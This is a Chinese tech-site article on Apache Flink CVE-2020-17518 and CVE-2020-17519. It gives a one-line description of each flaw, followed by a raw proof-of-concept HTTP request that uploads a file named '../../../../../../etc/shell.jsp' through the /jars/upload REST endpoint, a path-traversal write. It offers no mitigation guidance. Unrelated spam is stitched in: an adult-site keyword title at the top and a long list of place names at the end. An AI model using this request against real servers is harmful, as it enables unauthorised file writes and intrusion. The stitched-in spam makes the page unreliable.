91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Flink POC漏洞CVE-2020-17518/17519的示例分析

發布時間:2021-12-22 21:05:43 來源:億速云 閱讀:292 作者:柒染 欄目:大數據

今天就跟大家聊聊有關 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

?

CVE-2020-17518: 文件寫入

攻擊者利用REST API,可以修改HTTP頭,將上傳的文件寫入到本地文件系統上的任意位置(Flink 1.5.1進程能訪問到的)

CVE-2020-17519: 文件讀取

Apache Flink 1.11.0 允許攻擊者通過JobManager進程的REST API讀取JobManager本地文件系統上的任何文件(JobManager進程能訪問到的)

POC:

POST /jars/upload HTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189
------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../etc/shell.jsp"
success------WebKitFormBoundaryoZ8meKnrrso89R6Y--

看完上述內容,你們對 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

石首市| 茂名市| 锡林浩特市| 阿荣旗| 泾阳县| 游戏| 宁城县| 拜城县| 三都| 措勤县| 抚松县| 临漳县| 巧家县| 四子王旗| 葵青区| 含山县| 横山县| 铁岭市| 泸溪县| 深泽县| 修水县| 定南县| 招远市| 茌平县| 临泉县| 阿巴嘎旗| 屯门区| 乐至县| 洪泽县| 乌苏市| 修文县| 连平县| 临猗县| 安龙县| 龙南县| 汉中市| 舟山市| 嘉黎县| 浦江县| 会昌县| 丹江口市|